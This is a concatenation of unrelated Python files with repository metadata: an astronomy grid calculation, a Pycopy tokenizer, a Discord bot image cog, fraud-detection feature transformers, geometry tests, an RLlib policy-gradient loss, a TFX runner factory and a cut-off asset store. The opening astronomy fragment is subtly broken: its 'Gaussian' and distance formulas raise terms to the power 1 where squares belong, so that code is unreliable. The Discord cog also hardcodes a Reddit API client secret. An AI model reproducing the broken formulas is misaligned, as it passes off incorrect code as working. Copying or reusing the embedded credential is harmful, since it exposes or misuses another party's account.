# L(w-x) -- 1D Gaussian, normalized to 1 when integrating over x not omega
L_wx = np.exp(-xcoord ** 1 / (2 * eellipse['a'] ** 2)) * np.exp(
-ycoord ** 1 / (2 * eellipse['b'] ** 2)) / (2*np.pi*eellipse['a']*eellipse['b'])
p_xOis, grids = [], []
# TODO -- multiprocess this
for icand, cand_coord in enumerate(cand_coords):
# Rotate the galaxy
r = center_coord.separation(cand_coord).to('arcsec')
pa_gal = center_coord.position_angle(cand_coord).to('deg')
new_pa_gal = pa_gal + dtheta * units.deg
# p(w|O_i)
# x, y gal
x_gal = -r.value * np.sin(new_pa_gal).value
y_gal = r.value * np.cos(new_pa_gal).value
theta = np.sqrt((xcoord-x_gal)**1 + (ycoord-y_gal)**2) # arc sec
p_wOi = pw_Oi(theta,
theta_prior['ang_size'][icand], # phi
theta_prior)
# Product
grid_p = L_wx * p_wOi
# Save grids if returning
if return_grids:
grids.append(grid_p.copy())
# Sum
p_xOis.append(np.sum(grid_p)*grid_spacing_arcsec**1)
#import pdb; pdb.set_trace()
# Return
if return_grids:
return np.array(p_xOis), grids
else:
return np.array(p_xOis)
| 32.628571 | 120 | 0.595349 |
4a28031db8d9850f65de7f669b11456b16141a56 | 6,437 | py | Python | utokenize/utokenize.py | MaxTurchin/pycopy-lib | d7a69fc2a28031e2ca475c29239f715c1809d8cc | [
"PSF-2.0"
] | null | null | null | utokenize/utokenize.py | MaxTurchin/pycopy-lib | d7a69fc2a28031e2ca475c29239f715c1809d8cc | [
"PSF-2.0"
] | null | null | null | utokenize/utokenize.py | MaxTurchin/pycopy-lib | d7a69fc2a28031e2ca475c29239f715c1809d8cc | [
"PSF-2.0"
] | null | null | null | # (c) 2019 Paul Sokolovsky, MIT license
# This module is part of the Pycopy project, https://github.com/pfalcon/pycopy
from token import *
from ucollections import namedtuple
import uio
COMMENT = N_TOKENS + 0
NL = N_TOKENS + 1
ENCODING = N_TOKENS + 2
tok_name[COMMENT] = "COMMENT"
tok_name[NL] = "NL"
tok_name[ENCODING] = "ENCODING"
class TokenInfo(namedtuple("TokenInfo", ("type", "string", "start", "end", "line"))):
def __str__(self):
return "TokenInfo(type=%d (%s), string=%r, startl=%d, line=%r)" % (
self.type, tok_name[self.type], self.string, self.start, self.line
)
def get_indent(l):
for i in range(len(l)):
if l[i] != " " and l[i] != "\t":
return i, l[i:]
def get_str(l, readline):
lineno = 0
s = uio.StringIO()
if l.startswith('"""') or l.startswith("'''"):
sep = l[0:3]
s += sep
l = l[3:]
pos = 0
while True:
i = l.find(sep, pos)
if i >= 0:
if i > 0 and l[i - 1] == "\\":
pos = i + 1
continue
break
s += l
l = readline()
pos = 0
assert l
lineno += 1
s += l[:i + 3]
return s.getvalue(), l[i + 3:], lineno
lbuf = uio.StringIO(l)
sep = lbuf.read(1)
s += sep
while True:
c = lbuf.read(1)
if not c:
break
s += c
if c == "\\":
c = lbuf.read(1)
s += c
if c == "\n":
lbuf = uio.StringIO(readline())
lineno += 1
continue
elif c == sep:
break
return s.getvalue(), lbuf.read(), lineno
def tokenize(readline):
indent_stack = [0]
lineno = 0
paren_level = 0
yield TokenInfo(ENCODING, "utf-8", 0, 0, "")
while True:
l = readline()
lineno += 1
org_l = l
if not l:
break
i, l = get_indent(l)
if l == "\n":
yield TokenInfo(NL, l, lineno, 0, org_l)
continue
elif l == "\x0c\n":
yield TokenInfo(NL, "\n", lineno, 0, org_l)
continue
if l.startswith("#"):
yield TokenInfo(COMMENT, l.rstrip("\n"), lineno, 0, org_l)
yield TokenInfo(NL, "\n", lineno, 0, org_l)
continue
if paren_level == 0:
if i > indent_stack[-1]:
yield TokenInfo(INDENT, org_l[:i], lineno, 0, org_l)
indent_stack.append(i)
elif i < indent_stack[-1]:
while i != indent_stack[-1]:
yield TokenInfo(DEDENT, "", lineno, 0, org_l)
indent_stack.pop()
while l:
if l[0].isdigit() or (l.startswith(".") and len(l) > 1 and l[1].isdigit()):
seen_dot = False
t = ""
if l.startswith("0x") or l.startswith("0X"):
t = "0x"
l = l[2:]
elif l.startswith("0o") or l.startswith("0O"):
t = "0o"
l = l[2:]
elif l.startswith("0b") or l.startswith("0B"):
t = "0b"
l = l[2:]
while l and (l[0].isdigit() or l[0] == "." or l[0] == "_" or (t.startswith("0x") and l[0] in "ABCDEFabcdef")):
if l[0] == ".":
if seen_dot:
break
seen_dot = True
t += l[0]
l = l[1:]
if l.startswith("e") or l.startswith("E"):
t += l[0]
l = l[1:]
if l[0] in ("+", "-"):
t += l[0]
l = l[1:]
while l and (l[0].isdigit() or l[0] == "_"):
t += l[0]
l = l[1:]
if l.startswith("j"):
t += l[0]
l = l[1:]
yield TokenInfo(NUMBER, t, lineno, 0, org_l)
elif l[0].isalpha() or l.startswith("_") or ord(l[0]) >= 0xaa:
name = ""
while l and (l[0].isalpha() or l[0].isdigit() or l.startswith("_") or ord(l[0]) >= 0xaa):
name += l[0]
l = l[1:]
if (l.startswith('"') or l.startswith("'")) and name in ("b", "r", "rb", "br", "u", "f"):
s, l, lineno_delta = get_str(l, readline)
yield TokenInfo(STRING, name + s, lineno, 0, org_l)
lineno += lineno_delta
else:
yield TokenInfo(NAME, name, lineno, 0, org_l)
elif l == "\\\n":
l = readline()
lineno += 1
elif l[0] == "\n":
if paren_level > 0:
yield TokenInfo(NL, "\n", lineno, 0, org_l)
else:
yield TokenInfo(NEWLINE, "\n", lineno, 0, org_l)
break
elif l[0].isspace():
l = l[1:]
elif l.startswith('"') or l.startswith("'"):
s, l, lineno_delta = get_str(l, readline)
yield TokenInfo(STRING, s, lineno, 0, org_l)
lineno += lineno_delta
elif l.startswith("#"):
yield TokenInfo(COMMENT, l.rstrip("\n"), lineno, 0, org_l)
l = "\n"
else:
for op in (
"**=", "//=", ">>=", "<<=", "+=", "-=", "*=", "/=",
"%=", "@=", "&=", "|=", "^=", "**", "//", "<<", ">>",
"==", "!=", ">=", "<=", "...", "->"
):
if l.startswith(op):
yield TokenInfo(OP, op, lineno, 0, org_l)
l = l[len(op):]
break
else:
yield TokenInfo(OP, l[0], lineno, 0, org_l)
if l[0] in ("(", "[", "{"):
paren_level += 1
elif l[0] in (")", "]", "}"):
paren_level -= 1
l = l[1:]
while indent_stack[-1] > 0:
yield TokenInfo(DEDENT, "", lineno, 0, "")
indent_stack.pop()
yield TokenInfo(ENDMARKER, "", lineno, 0, "")
| 32.841837 | 126 | 0.388069 |
4a2803d6746a029ea0407a9a1734144e056fbe30 | 4,209 | py | Python | cogs/images.py | Stift007/OctoCat | 0ea54c106ae6321a62e9ab459aede7efd2116c3e | [
"MIT"
] | null | null | null | cogs/images.py | Stift007/OctoCat | 0ea54c106ae6321a62e9ab459aede7efd2116c3e | [
"MIT"
] | null | null | null | cogs/images.py | Stift007/OctoCat | 0ea54c106ae6321a62e9ab459aede7efd2116c3e | [
"MIT"
] | null | null | null | import os
import discord
import random
from io import BytesIO
import aiohttp
from discord.ext import commands
import praw
import requests
from data import reddit
from PIL import Image
APP_ID = reddit.APP_ID
SECRET = reddit.SECRET
class Images(commands.Cog):
def __init__(self,bot):
self.bot = bot
@commands.command()
async def avatarfusion(this,ctx,member_1:discord.Member,member_2:discord.Member):
asset1 = member_1.avatar_url_as(size=128)
data1 = BytesIO(await asset1.read())
asset2 = member_2.avatar_url_as(size=128)
data2 = BytesIO(await asset2.read())
background = Image.open(data1)
foreground = Image.open(data2)
background.paste(foreground, (0, 0), foreground)
background.save(f"overlay{ctx.author.id}.png")
await ctx.reply(file=discord.File(f"overlay{ctx.author.id}.png"))
os.remove(f"overlay{ctx.author.id}.png")
@commands.command()
async def reddit(self,ctx,subreddit:str = ""):
if subreddit in open("data/REDDIT_NSFW_SUBS").read() and not ctx.channel.is_nsfw():
return await ctx.send("NSFW Subreddits are locked outside of NSFW-Marked channels.")
subreddit = subreddit.replace("r/","")
reddit = praw.Reddit(client_id="ON1G_de1I2-cFIaAUWB7ew",
client_secret="YUvMk-ZianKdX7AJ_vCQOxlLUVaHaQ",
user_agent="<agentOcto:1.0.0>")
sub = reddit.subreddit(subreddit)
subs = []
for submission in sub.top(limit=50):
subs.append(submission)
random_sub = random.choice(subs)
name = random_sub.title
url = random_sub.url
comments = random_sub.num_comments
updoots = random_sub.score
embed = discord.Embed(title=name).set_image(url=url).set_footer(text=f"💬 {comments} / 👍 {updoots}")
await ctx.send(embed=embed)
#This here is One of three Commands on one of 7 Extensions
#This here is One of three Commands on one of 7 Extensions
@commands.command()
async def meme(self,ctx):
async with aiohttp.ClientSession() as cs:
async with cs.get("https://www.reddit.com/r/memes.json") as r:
memes = await r.json()
embed = discord.Embed(
color=discord.Color.purple()
)
embed.set_image(url=memes["data"]["children"][random.randint(0,25)]["data"]["url"])
embed.set_footer(text=f'Powered by r/memes | Meme requested by {ctx.author}')
await ctx.send(embed=embed)
@commands.command()
async def cat(self,ctx):
async with ctx.channel.typing():
async with aiohttp.ClientSession() as cs:
async with cs.get("http://aws.random.cat/meow") as r:
data = await r.json()
embed = discord.Embed(title="Meow",color=discord.Color.random())
embed.set_image(url=data['file'])
embed.set_footer(text="http://random.cat/")
await ctx.send(embed=embed)
@commands.command()
async def dog(self,ctx):
async with ctx.channel.typing():
async with aiohttp.ClientSession() as cs:
async with cs.get("https://random.dog/woof.json") as r:
data = await r.json()
embed = discord.Embed(title="Woof",color=discord.Color.random())
embed.set_image(url=data['url'])
embed.set_footer(text="http://random.dog/")
await ctx.send(embed=embed)
@commands.command(aliases=["floof"])
async def fox(self,ctx):
async with ctx.channel.typing():
async with aiohttp.ClientSession() as cs:
async with cs.get("https://randomfox.ca/floof") as r:
data = await r.json()
embed = discord.Embed(title="Floofy",color=discord.Color.random())
embed.set_image(url=data['image'])
embed.set_footer(text="http://randomfox.ca/")
await ctx.send(embed=embed)
def setup(bot):
bot.add_cog(Images(bot))
| 36.284483 | 107 | 0.594916 |
4a280667fb44f8652873298c09961a3156df0849 | 315 | py | Python | variation1.py | benjamin-wilkins/trigonometry-circles | c366f72e520c4556c82699652e0345b5b3e15f32 | [
"MIT"
] | null | null | null | variation1.py | benjamin-wilkins/trigonometry-circles | c366f72e520c4556c82699652e0345b5b3e15f32 | [
"MIT"
] | null | null | null | variation1.py | benjamin-wilkins/trigonometry-circles | c366f72e520c4556c82699652e0345b5b3e15f32 | [
"MIT"
] | null | null | null | import math, turtle
turtle = turtle.Turtle()
turtle.speed(0)
def findPoints(radius):
for i in range(361):
y = radius * math.sin(0.01745329 * i)
yield [0, y]
x = radius * math.cos(0.01745329 * i)
yield [x, 0]
yield [x, y]
for i in findPoints(200):
turtle.goto(i) | 22.5 | 45 | 0.565079 |
4a280761fc7b947add578c843533b7d744117363 | 7,034 | py | Python | src/feature/feature.py | Adam1679/fraud-detection | b84169ad2ab9383e9cc463fb286aba26a31fd161 | [
"MIT"
] | null | null | null | src/feature/feature.py | Adam1679/fraud-detection | b84169ad2ab9383e9cc463fb286aba26a31fd161 | [
"MIT"
] | null | null | null | src/feature/feature.py | Adam1679/fraud-detection | b84169ad2ab9383e9cc463fb286aba26a31fd161 | [
"MIT"
] | null | null | null | from sklearn.base import BaseEstimator, TransformerMixin
import json
import numpy as np
import pandas as pd
from itertools import product
class Email_Engineering(BaseEstimator, TransformerMixin):
"""
对太多的域名进行了降纬分类,处理
credit to ``https://www.kaggle.com/amirhmi/a-comprehensive-guide-to-get-0-9492``
"""
def __init__(self, names):
if not isinstance(names, list):
self.names = list(names)
else:
self.names = names
self.us_emails = {'gmail', 'net', 'edu'}
with open("./ieee-fraud-detection/email.json") as f:
self.emails = json.load(f)
def fit(self, x, y=None):
return self
def transform(self, x):
for c in self.names:
x[c + "_bin"] = x[c].map(self.emails)
x[c + '_suffix'] = x[c].map(lambda x: str(x).split('.')[-1])
x[c + '_suffix'] = x[c + '_suffix'].map(lambda x: x if str(x) not in self.us_emails else 'us')
x['is_proton_mail'] = (x['P_emaildomain'] == 'protonmail.com') | (x['R_emaildomain'] == 'protonmail.com')
return x
class Browser_Engineering(BaseEstimator, TransformerMixin):
"""
对浏览器进行了处理
credit to ``https://www.kaggle.com/amirhmi/a-comprehensive-guide-to-get-0-9492``
"""
def __init__(self, name, verbose=1):
self.name = name
self.verbose = verbose
with open("./ieee-fraud-detection/latest_browsers.txt") as f:
self.latest_browser = set(map(str.strip, f.readlines()))
def fit(self, x, y=None):
return self
def transform(self, x):
nan_mask = x[self.name].isnull()
x['is_latest_browser'] = x[self.name].fillna("NaN")
x['is_latest_browser'] = x['is_latest_browser'].map(lambda y: 1 if y in self.latest_browser else 0)
x['is_latest_browser'] = x['is_latest_browser'].astype(np.int8)
x.loc[nan_mask, 'is_latest_browser'] = np.nan
if self.verbose:
print(
f"Summarize: # of 1 = {x['is_latest_browser'].sum()}, # of NaN = {x['is_latest_browser'].isnull().sum()}")
return x
class Std_2var_Engineering(BaseEstimator, TransformerMixin):
"""
双变量交互(std)
credit to ``https://www.kaggle.com/amirhmi/a-comprehensive-guide-to-get-0-9492``
"""
def __init__(self, numerical_features, categorical_features, verbose=1):
self.n_feas = list(numerical_features)
self.c_feas = list(categorical_features)
self.verbose = verbose
def fit(self, x, y=None):
return self
def transform(self, x):
for a, b in product(self.n_feas, self.c_feas):
nan_mask = x[a].isnull() | x[b].isnull()
name = a + "_to_std_" + b
x[name] = x[a] / x.groupby([b])[a].transform('std')
x.loc[nan_mask, name] = np.nan
if self.verbose:
print(f"Generate: {name}")
return x
class Mean_2var_Engineering(BaseEstimator, TransformerMixin):
"""
双变量交互(mean)
credit to ``https://www.kaggle.com/amirhmi/a-comprehensive-guide-to-get-0-9492``
"""
def __init__(self, numerical_features, categorical_features, verbose=1):
self.n_feas = list(numerical_features)
self.c_feas = list(categorical_features)
self.verbose = verbose
def fit(self, x, y=None):
return self
def transform(self, x):
for a, b in product(self.n_feas, self.c_feas):
nan_mask = x[a].isnull() | x[b].isnull()
name = a + "_to_mean_" + b
x[name] = x[a] / x.groupby([b])[a].transform('mean')
x.loc[nan_mask, name] = np.nan
if self.verbose:
print(f"Generate: {name}")
return x
class Add_2var_Engineering(BaseEstimator, TransformerMixin):
"""
双分类变量交互
credit to ``https://www.kaggle.com/amirhmi/a-comprehensive-guide-to-get-0-9492``
"""
def __init__(self, feature_pairs, verbose=1):
self.pairs = list(feature_pairs)
self.verbose = verbose
def fit(self, x, y=None):
return self
def transform(self, x):
for feas in self.pairs:
name = None
if len(feas) == 2:
a, b = feas
nan_mask = x[a].isnull() | x[b].isnull()
name = a + "_" + b
x[name] = x[a].astype(str) + "_" + x[b].astype(str)
elif len(feas) == 3:
a, b, c = feas
nan_mask = x[a].isnull() | x[b].isnull() | x[c].isnull()
name = a + "_" + b + "_" + c
x[name] = x[a].astype(str) + "_" + x[b].astype(str) + "_" + x[c].astype(str)
x.loc[nan_mask, name] = np.nan
if self.verbose:
print(f"Generate: {name}")
return x
class Count_Engineering(BaseEstimator, TransformerMixin):
"""
添加分类变量的频率信息
credit to ``https://www.kaggle.com/cdeotte/200-magical-models-santander-0-920``
"""
def __init__(self, categorical_features, verbose=1):
self.names = list(categorical_features)
self.verbose = verbose
self.counts = dict()
def fit(self, x, y=None):
for c in self.names:
self.counts[c] = x[c].value_counts(dropna=False)
return self
def transform(self, x):
for c in self.names:
name = c + "_count"
nan_mask = x[c].isnull()
if not (c in self.counts):
self.counts[c] = x[c].value_counts(dropna=False)
if name in x.columns:
name += "X"
x[name] = x[c].map(self.counts[c])
x.loc[nan_mask, name] = np.nan
if self.verbose:
print(f"Generate: {name}")
return x
class Drop_Features(BaseEstimator, TransformerMixin):
"""
删除一些的特征
credit to ``https://www.kaggle.com/amirhmi/a-comprehensive-guide-to-get-0-9492``
"""
def __init__(self, percentage, percentage_dup, verbose=1):
self.perc = percentage
self.perc_dup = percentage_dup
self.verbose = verbose
def fit(self, x, y=None):
missing_values = x.isnull().sum() / len(x)
missing_drop_cols = list(missing_values[missing_values > self.perc].keys())
if "isFraud" in missing_drop_cols:
missing_drop_cols.remove("isFraud")
self.dropped_cols = missing_drop_cols
duplicate_drop_cols = [col for col in x.columns if
x[col].value_counts(dropna=False, normalize=True).values[0] > self.perc_dup]
if "isFraud" in duplicate_drop_cols:
duplicate_drop_cols.remove("isFraud")
self.dropped_cols.extend(duplicate_drop_cols)
if self.verbose:
print(f"Summarize: {len(missing_drop_cols)} columns have missing value(%) > {self.perc}")
print(f"Summarize: {len(duplicate_drop_cols)} columns have duplicate value(%) > {self.perc_dup}")
return self
def transform(self, x):
return x.drop(self.dropped_cols, axis=1) | 33.179245 | 122 | 0.579471 |
4a28081b8e8d2b7841d36bfcb59f0867aa0d58c5 | 2,583 | py | Python | geometry_analysis/tests/test_geometry_analysis.py | HanboHong/geometry_analysis | 4c73fb9119b8a38d149ce022f2425c30afff2464 | [
"BSD-3-Clause"
] | null | null | null | geometry_analysis/tests/test_geometry_analysis.py | HanboHong/geometry_analysis | 4c73fb9119b8a38d149ce022f2425c30afff2464 | [
"BSD-3-Clause"
] | null | null | null | geometry_analysis/tests/test_geometry_analysis.py | HanboHong/geometry_analysis | 4c73fb9119b8a38d149ce022f2425c30afff2464 | [
"BSD-3-Clause"
] | null | null | null | """
Unit and regression test for the geometry_analysis package.
"""
# Import package, test suite, and other packages as needed
import geometry_analysis
import pytest
import sys
import numpy as np
def test_geometry_analysis_imported():
"""Sample test, will always pass so long as import statement worked"""
assert "geometry_analysis" in sys.modules
def test_calculate_distance():
"""Test the calculate_distance function"""
r1 = np.array([0,0,-1])
r2 = np.array([0,1,0])
expected_distance = np.sqrt(2)
calculated_distance = geometry_analysis.calculate_distance(r1, r2)
assert expected_distance == calculated_distance
def test_calculate_angle_90():
"""Test the calculate_angle function"""
A = np.array([1,0,0])
B = np.array([0,0,0])
C = np.array([0,1,0])
expected_angle = 90
calculated_angle = geometry_analysis.calculate_angle(A,B,C, True)
assert expected_angle == calculated_angle
def test_calculate_angle_60():
"""Test another value of the calculate_angle function"""
A = np.array([0,0,-1])
B = np.array([0,1,0])
C = np.array([1,0,0])
expected_value = 60
calculated_value = geometry_analysis.calculate_angle(A,B,C, True)
assert np.isclose(expected_value, calculated_value)
@pytest.mark.parametrize("p1, p2, p3, expected_angle", [
(np.array([1,0,0]), np.array([0,0,0]), np.array([0,1,0]), 90),
(np.array([0,0,-1]), np.array([0,1,0]), np.array([1,0,0]), 60),
])
def test_calculate_angle(p1, p2, p3, expected_angle):
calculated_angle = geometry_analysis.calculate_angle(p1, p2, p3, True)
assert np.isclose(expected_angle, calculated_angle)
@pytest.fixture()
def water_molecule():
name = "water"
symbols = ["H", "O", "H"]
coordinates = np.array([[2,0,0], [0,0,0], [-2,0,0]])
water = geometry_analysis.Molecule(name, symbols, coordinates)
return water
def test_create_failure():
name = 25
symbols = ["H", "O", "H"]
coordinates = np.zeros([3,3])
with pytest.raises(TypeError):
water = geometry_analysis.Molecule(name, symbols, coordinates)
def test_molecule_set_coordinates(water_molecule):
"""Test that bond list is rebuilt when we reset coordinates."""
num_bonds = len(water_molecule.bonds)
assert num_bonds == 2
new_coordinates = np.array([[999,0,0], [0,0,0], [-2,0,0]])
water_molecule.coordinates = new_coordinates
new_bonds = len(water_molecule.bonds)
assert new_bonds == 1
assert np.array_equal(new_coordinates, water_molecule.coordinates)
| 24.140187 | 74 | 0.675184 |
4a2808410dd100a720d3100d0c2d8cb7a3588835 | 2,023 | py | Python | rllib/agents/pg/pg_tf_policy.py | daobook/ray | af9f1ef4dc160e0671206556b387f8017f3c3930 | [
"Apache-2.0"
] | 33 | 2020-05-27T14:25:24.000Z | 2022-03-22T06:11:30.000Z | rllib/agents/pg/pg_tf_policy.py | daobook/ray | af9f1ef4dc160e0671206556b387f8017f3c3930 | [
"Apache-2.0"
] | 125 | 2018-01-31T06:57:41.000Z | 2022-03-26T07:07:14.000Z | rllib/agents/pg/pg_tf_policy.py | daobook/ray | af9f1ef4dc160e0671206556b387f8017f3c3930 | [
"Apache-2.0"
] | 5 | 2020-08-06T15:53:07.000Z | 2022-02-09T03:31:31.000Z | """
TensorFlow policy class used for PG.
"""
from typing import List, Type, Union
import ray
from ray.rllib.agents.pg.utils import post_process_advantages
from ray.rllib.evaluation.postprocessing import Postprocessing
from ray.rllib.models.action_dist import ActionDistribution
from ray.rllib.models.modelv2 import ModelV2
from ray.rllib.policy import Policy
from ray.rllib.policy.tf_policy_template import build_tf_policy
from ray.rllib.policy.sample_batch import SampleBatch
from ray.rllib.utils.framework import try_import_tf
from ray.rllib.utils.typing import TensorType
tf1, tf, tfv = try_import_tf()
def pg_tf_loss(
policy: Policy, model: ModelV2, dist_class: Type[ActionDistribution],
train_batch: SampleBatch) -> Union[TensorType, List[TensorType]]:
"""The basic policy gradients loss function.
Args:
policy (Policy): The Policy to calculate the loss for.
model (ModelV2): The Model to calculate the loss for.
dist_class (Type[ActionDistribution]: The action distr. class.
train_batch (SampleBatch): The training data.
Returns:
Union[TensorType, List[TensorType]]: A single loss tensor or a list
of loss tensors.
"""
# Pass the training data through our model to get distribution parameters.
dist_inputs, _ = model(train_batch)
# Create an action distribution object.
action_dist = dist_class(dist_inputs, model)
# Calculate the vanilla PG loss based on:
# L = -E[ log(pi(a|s)) * A]
return -tf.reduce_mean(
action_dist.logp(train_batch[SampleBatch.ACTIONS]) * tf.cast(
train_batch[Postprocessing.ADVANTAGES], dtype=tf.float32))
# Build a child class of `DynamicTFPolicy`, given the extra options:
# - trajectory post-processing function (to calculate advantages)
# - PG loss function
PGTFPolicy = build_tf_policy(
name="PGTFPolicy",
get_default_config=lambda: ray.rllib.agents.pg.DEFAULT_CONFIG,
postprocess_fn=post_process_advantages,
loss_fn=pg_tf_loss)
| 35.491228 | 78 | 0.739496 |
4a280a2b21daa731de9f5b32caf41b88135ec9b4 | 2,962 | py | Python | tfx/components/infra_validator/model_server_runners/factory.py | BioGeek/tfx | 3d30ae8a1e2f33367c592ca86562cf555193cfb6 | [
"Apache-2.0"
] | 1 | 2020-11-24T16:59:37.000Z | 2020-11-24T16:59:37.000Z | tfx/components/infra_validator/model_server_runners/factory.py | BioGeek/tfx | 3d30ae8a1e2f33367c592ca86562cf555193cfb6 | [
"Apache-2.0"
] | null | null | null | tfx/components/infra_validator/model_server_runners/factory.py | BioGeek/tfx | 3d30ae8a1e2f33367c592ca86562cf555193cfb6 | [
"Apache-2.0"
] | null | null | null | # Copyright 2020 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Factory for making model server runners."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from typing import Iterable
from tfx.components.infra_validator.model_server_clients import factory
from tfx.components.infra_validator.model_server_runners import base_runner
from tfx.components.infra_validator.model_server_runners import local_docker_runner
from tfx.proto import infra_validator_pb2
from tfx.types import standard_artifacts
def create_model_server_runners(
model: standard_artifacts.Model,
serving_spec: infra_validator_pb2.ServingSpec
) -> Iterable[base_runner.BaseModelServerRunner]:
"""Create model server runners based on given model and serving spec.
In ServingSpec you can specify multiple versions for validation on single
image. In such case it returns multiple model server runners for each
(image, version) pair.
Args:
model: A model artifact whose uri contains the path to the servable model.
serving_spec: A ServingSpec configuration.
Returns:
An iterable of `BaseModelServerRunner`.
"""
platform_kind = serving_spec.WhichOneof('serving_platform')
if platform_kind == 'local_docker':
return _create_local_docker_runners(model, serving_spec)
else:
raise NotImplementedError('{} platform is not yet supported'
.format(platform_kind))
def _create_local_docker_runners(
model: standard_artifacts.Model,
serving_spec: infra_validator_pb2.ServingSpec,
) -> Iterable[base_runner.BaseModelServerRunner]:
client_factory = factory.make_client_factory(model, serving_spec)
for image_uri in _build_docker_uris(serving_spec):
yield local_docker_runner.LocalDockerModelServerRunner(
model=model,
image_uri=image_uri,
config=serving_spec.local_docker,
client_factory=client_factory)
def _build_docker_uris(serving_spec):
binary_kind = serving_spec.WhichOneof('serving_binary')
if binary_kind == 'tensorflow_serving':
for tag in serving_spec.tensorflow_serving.tags:
yield 'tensorflow/serving:{}'.format(tag)
for digest in serving_spec.tensorflow_serving.digests:
yield 'tensorflow/serving@{}'.format(digest)
else:
raise NotImplementedError('{} binary is not yet supported'
.format(binary_kind))
| 37.974359 | 83 | 0.770088 |
4a280b93ccf38ea88b851d49a2d3f16716ca7ac4 | 302 | py | Python | odooku_data/serialization/fields.py | odooku/odooku-data | c9f47eb04d7f04cbd2e204779a7023e9e59ec9ab | [
"Apache-2.0"
] | null | null | null | odooku_data/serialization/fields.py | odooku/odooku-data | c9f47eb04d7f04cbd2e204779a7023e9e59ec9ab | [
"Apache-2.0"
] | null | null | null | odooku_data/serialization/fields.py | odooku/odooku-data | c9f47eb04d7f04cbd2e204779a7023e9e59ec9ab | [
"Apache-2.0"
] | 1 | 2020-10-06T12:00:02.000Z | 2020-10-06T12:00:02.000Z | from odooku_data.serialization.base import BaseFieldSerializer
class FieldSerializer(BaseFieldSerializer):
def serialize(self, record, context):
return record.read([self.field_name])[0][self.field_name]
def deserialize(self, values, context):
return values[self.field_name]
| 27.454545 | 65 | 0.751656 |
4a280cfd33a4222a136048f49d7199d6ce60dbca | 7,401 | py | Python | mahiru/components/asset_store.py | SecConNet/proof_of_concept | 80f6b27ff6b97796803e554387ca2881a792be79 | [
"Apache-2.0"
] | 4 | 2021-03-26T09:17:51.000Z | 2021-05-17T10:31:59.000Z | mahiru/components/asset_store.py | SecConNet/proof_of_concept | 80f6b27ff6b97796803e554387ca2881a792be79 | [
"Apache-2.0"
] | 58 | 2020-03-02T10:02:51.000Z | 2021-07-09T09:23:49.000Z | mahiru/components/asset_store.py | SecConNet/proof_of_concept | 80f6b27ff6b97796803e554387ca2881a792be79 | [
"Apache-2.0"
] | null | null | null | """Storage and exchange of data and compute assets."""
from copy import copy
import logging
from pathlib import Path
from shutil import copyfile, move, rmtree
from tempfile import mkdtemp
from typing import Dict, Optional
from mahiru.definitions.assets import Asset, ComputeAsset, DataAsset
from mahiru.definitions.connections import ConnectionInfo, ConnectionRequest
from mahiru.definitions.identifier import Identifier
from mahiru.definitions.interfaces import IAssetStore, IDomainAdministrator
from mahiru.policy.evaluation import PermissionCalculator, PolicyEvaluator
logger = logging.getLogger(__name__)
class AssetStore(IAssetStore):
"""A simple store for assets."""
def __init__(
self, policy_evaluator: PolicyEvaluator,
domain_administrator: IDomainAdministrator,
image_dir: Optional[Path] = None) -> None:
"""Create a new empty AssetStore.
Args:
policy_evaluator: Policy evaluator to use for access
checks.
domain_administrator: Domain administrator to use for
serving assets over the network.
image_dir: Local directory to store image files in.
"""
self._policy_evaluator = policy_evaluator
self._domain_administrator = domain_administrator
self._permission_calculator = PermissionCalculator(policy_evaluator)
# TODO: lock this
self._assets = dict() # type: Dict[Identifier, Asset]
if image_dir is None:
# TODO: add mahiru prefix
image_dir = Path(mkdtemp())
self._image_dir = image_dir
# Requester per connection
self._connection_owners = dict() # type: Dict[str, Identifier]
def close(self) -> None:
"""Releases resources, call when done."""
rmtree(self._image_dir, ignore_errors=True)
def store(self, asset: Asset, move_image: bool = False) -> None:
"""Stores an asset.
Args:
asset: asset object to store
move_image: If the asset has an image and True is passed,
the image file will be moved rather than copied into
the store.
Raises:
KeyError: If there's already an asset with the asset id.
"""
if asset.id in self._assets:
raise KeyError(f'There is already an asset with id {id}')
# TODO: ordering, get file first then insert Asset object
self._assets[asset.id] = copy(asset)
if asset.image_location is not None:
src_path = Path(asset.image_location)
tgt_path = self._image_dir / f'{asset.id}.tar.gz'
if move_image:
move(str(src_path), str(tgt_path))
else:
copyfile(src_path, tgt_path)
self._assets[asset.id].image_location = str(tgt_path)
def store_image(
self, asset_id: Identifier, image_file: Path,
move_image: bool = False) -> None:
"""Stores an image for an already-stored asset.
Args:
asset_id: ID of the asset to add an image for.
move: Whether to move the input file rather than copy it.
Raises:
KeyError: If there's no asset with the given ID.
"""
if asset_id not in self._assets:
raise KeyError(f'Asset with id {asset_id} not found.')
asset = self._assets[asset_id]
tgt_path = self._image_dir / f'{asset_id}.tar.gz'
if move_image:
move(str(image_file), str(tgt_path))
else:
copyfile(image_file, tgt_path)
asset.image_location = str(tgt_path)
def retrieve(self, asset_id: Identifier, requester: Identifier) -> Asset:
"""Retrieves an asset.
Args:
asset_id: ID of the asset to retrieve.
requester: Name of the site making the request.
Return:
The asset object with asset_id.
Raises:
KeyError: If no asset with the given id is stored here.
"""
logger.info(f'{self}: servicing request from {requester} for data: '
f'{asset_id}')
self._check_request(asset_id, requester)
logger.info(f'{self}: Sending asset {asset_id} to {requester}')
return self._assets[asset_id]
def serve(
self, asset_id: Identifier, request: ConnectionRequest,
requester: Identifier) -> ConnectionInfo:
"""Serves an asset via a secure network connection.
Args:
asset_id: ID of the asset to serve.
request: Connection request describing the desired
connection.
requester: The site requesting this connection.
Return:
ConnectionInfo object for the connection.
Raises:
KeyError: If the asset was not found.
RuntimeError: If the requester does not have permission to
access this asset, or connections are disabled.
"""
logger.info(f'{self}: servicing request from {requester} for'
f' connection to {asset_id}')
self._check_request(asset_id, requester)
conn_info = self._domain_administrator.serve_asset(
self._assets[asset_id], request)
self._connection_owners[conn_info.conn_id] = requester
return conn_info
def stop_serving(self, conn_id: str, requester: Identifier) -> None:
"""Stop serving an asset and close the connection.
Args:
conn_id: Connection id previously returned by serve().
requester: The site requesting to stop.
Raises:
KeyError: If the connection was not found.
RuntimeError: If the requester does not have permission to
stop this connection.
"""
if conn_id not in self._connection_owners:
